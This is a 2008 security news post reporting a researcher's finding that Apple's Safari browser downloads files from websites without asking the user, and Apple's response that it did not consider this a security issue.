CyberInsecure.com

Daily cyber threats and internet security news alerts
May 15th, 2008

Apple’s Safari Downloads Websites Resources Without Asking For Permission

According to researcher Nitesh Dhanjani, Safari browser doesn’t bother to ask for user permission before downloading resources from websites. When encountering malicious iframes and other scripts, the browser obediently does what the website tells it to do, including downloading a file as many times as HTML scripts order.

The vulnerability allows miscreants to dump hundreds of malicious files into a user’s default download location (in Windows it’s the desktop and in OS X it’s the download folder). It wouldn’t be hard for a rogue site, for example, to load up a desktop with dozens of booby-trapped “My Computer” icons that look like the real Windows icon and wait for a confused user to accidentally click on them.

When informed of this vulnerability, Apple agreed that it might be good if Safari actually checked with the user before downloading potentially vicious files, but signaled that kind of addition wasn’t much of a priority.

According to Apple’s security team, they are not treating this as a security issue, but a further measure to raise the bar against unwanted downloads. Apple wants to set users expectations that this could take quite a while, if it ever gets incorporated. Apple uses its security update mechanism as a way to push Safari on users who have never installed the browser, something that offends the sensibilities of many who believe security update notices should be reserved only for buggy software that presents a clear and present danger - that is for buggy software that’s already installed.

Email, Bookmark or Share:
  • E-mail this story to a friend!
  • Digg
  • del.icio.us
  • StumbleUpon
  • Reddit
  • Technorati
  • Slashdot
  • Propeller
  • Google
  • Live
  • YahooMyWeb
  • Facebook
  • LinkedIn
More on CyberInsecure:
  • Microsoft Alerts Users Not To Use Safari Due To Carpet Bombing Vulnerability
  • Apple Patches Multiple Vulnerabilities In Safari 3.1.1
  • Apple Safari Domain Extensions Insecure Cookie Access Vulnerability
  • Researcher Publishes Two iPhone Vulnerabilities That Apple Just Wouldn’t Patch
  • AVG Free Security Scanner Goes Multi-Lingual

    • Posted in Apple, Vulnerabilities | Print This Post Print This Post

    This entry was posted on Thursday, May 15th, 2008 at 3:27 pm and is filed under Apple, Vulnerabilities. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

    If you found this information useful, consider linking to it from your own website.
    Just copy and paste the code below into your website (Ctrl+C to copy)
    It will look like this: Apple’s Safari Downloads Websites Resources Without Asking For Permission

    Leave a Reply

    Comments with unsolicited links to other resources will be marked as spam. Please leave your real email, it wont be published.

    *
    To prove you're a person (not a spam script), type the security word shown in the picture. Click on the picture to hear an audio file of the word.
    Click to hear an audio file of the anti-spam word

    « « Oklahoma State University Parking Services Server Compromised
    NSA Goes Offline Due To A DNS Glitch » »